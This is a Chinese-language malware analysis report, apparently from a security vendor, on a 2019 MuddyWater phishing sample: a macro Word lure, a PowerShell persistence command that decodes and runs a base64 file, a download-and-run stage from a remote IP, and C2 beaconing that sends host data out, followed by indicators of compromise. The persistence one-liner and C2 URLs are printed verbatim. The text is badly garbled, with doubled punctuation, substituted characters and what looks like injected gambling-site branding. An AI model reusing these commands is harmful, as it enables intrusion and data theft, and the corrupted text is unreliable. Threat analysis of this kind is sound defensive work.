MuddyWater（污水）最新攻击样天职析

宣布时间 2019-05-10

MuddyWater是一个来自于伊朗的主要针对中东地区举行攻击的APT组织，，，，，其攻击目的主要集中于政府、电信及能源等领域。。。

克日，，，，，Z6尊龙凯时金睛清静研究团队通过VenusEye威胁情报中心狩猎系统捕获到一个可疑文档，，，，，经太过析确认其为MuddyWater最新攻击样本。。。

载荷剖析

攻击样本为一个Word文档，，，，，翻开后会显示如下图片，，，，，诱使受害者启用宏。。。

宏代码执行后，，，，，会释放c:\programdata\SysTextEnc.ini文件。。。该文件内容为一串Base64编码数据。。。

然后向启动项写入如下下令行：
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

用于开机解密并执行c:\programdata\SysTextEnc.ini文件。。。解密之后为一段powershell代码，，，，，该代码用于请求hxxp://38.132.99.167/crf.txt链接的数据并执行，，，，，该链接返回的数据仍然是一段Powershell代码。。。

Z6·尊龙凯时「中国区」官方网站

木马剖析

上述历程中下载的Powershell代码即MuddyWater组织习用的powershell木马。。。

解混淆后，，，，，其主函数如下所示：

依次执行wlChecul，，，，，pmrHlsl，，，，，GECOANOO，，，，，gfxEcmdascrsltp这四个函数。。。其中wlChecul只是为了确认效劳器准备状态。。。结构如下URL并以POST方法发送请求：
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

若是返回值不为空且不为%COPYTHAT%才会执行后续函数。。。之后执行pmrHlsl函数，，，，，该函数会挪用WMI获取多种盘算机信息。。。

将获得的信息使用“*”举行拼接。。。盘算拼接后字符串的MD5，，，，，再和“*1997* EP1”举行拼接，，，，，最后举行base64编码。。。

之后将结构出来的Base64编码数据拼接成如下URL并以POST方法发送出去：
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

若是返回效果不为空并且不为%BYE%则继续后续函数的执行。。。接下来要执行的函数为GECOANOO。。。

GeCOANOO函数结构如下数据，，，，，并以POST方法将其发送出去：
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

其中的EncryptedData即上一次发送数据中举行Base64编码的MD5部分。。。若是返回效果不为空且返回值经由base64解码后不为"SHH"，，，，，则将解码后的返回值赋值给一个全局变量gecdrEu，，，，，然后执行下一个函数，，，，，可以判断赋值给gecdrEu的数据为一段powershell代码。。。

最后通过gfxEcmdascrsltp函数执行全局变量中的gecdrEu中的powershell代码。。。

并将返回值举行base64编码，，，，，拼集成如下的URL名堂举行上传。。。
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]

溯源剖析

通过VenusEye威胁情报中心关联系统，，，，，我们发明了另一个早期的样本。。。

该样本所使用的手艺都与本次我们发明的样本如出一辙。。。

通过溯源剖析，，，，，我们发明这两个样本都与友商4月10日在社交媒体上披露的MuddyWater攻击土耳其的样内情似。。。下面是两者的宏代码比照。。。

Z6·尊龙凯时「中国区」官方网站

通过比照可以发明，，，，，二者都使用相同的方法获取盘算机信息，，，，，然后使用相同的盘算方法盘算受害者主机的唯一标识。。。

Z6·尊龙凯时「中国区」官方网站

相比之下，，，，，早期发明的样本将上线请求、获取powershell代码、上传下令行执行效果拆分成差别PHP举行交互。。。而现在的版本则使用统一个PHP文件举行交互。。。并且早期版本若是在执行历程中遇到过失，，，，，则会将过失信息纪录日志，，，，，可是最新版本则直接竣事目今程序。。。

关于执行流程来说，，，，，最新版内情关于早期版本也有较大差别，，，，，二者的执行流程如下：

相比之下，，，，，最新的攻击活动增添了其基础设施，，，，，并且将主体代码安排到远程效劳器中而不是直接通过垂纶文档释放到外地。。�？？？？？梢钥闯龈米橹谝恢钡母缕涔セ鞣椒ê头兰觳夥椒�。。。

总结

MuddyWater组织自披露之月朔直活跃至今，，，，，该组织很是青睐使用Powershell脚原来编写其攻击工具，，，，，并衍生出了该组织的专有木马POWERSTATS。。。虽然该组织的Powershell木马更新换代很快，，，，，可是我们仍能从其powershell代码中看到些许POWERSTATS的影子。。。

威胁指标（IOC）

97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt

解决计划

1、Z6尊龙凯时VenusEye威胁情报中心已经支持对本次攻击活动相关情报的盘问。。。

2、已安排Z6尊龙凯时IDS、IPS产品的客户请升级事务库到最新版本，，，，，即可有用检测或阻断攻击。。。

3、已安排Z6尊龙凯时APT检测产品的客户无需升级，，，，，即可有用检测此次攻击。。。

Z6·尊龙凯时「中国区」官方网站

7*24小时效劳热线

400-624-3900

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

Z6尊龙凯时

网络清静防护

网络清静检测

应用清静

数据清静

清静治理

云清静

工控清静

移动及终端清静

密码应用清静

专业清静效劳

清静运营中心

知白学院

威胁情报中心

清静转达

研究报告

清静团队

渠道系统

售后效劳

升级通告

软件升级

公司概况

新闻动态

手艺专题

人才招聘

投资者关系

资源中心

联系Z6尊龙凯时

关于Z6尊龙凯时

MuddyWater（污水）最新攻击样天职析

关于Z6尊龙凯时

解决计划

清静研究

联系Z6尊龙凯时

7*24小时效劳热线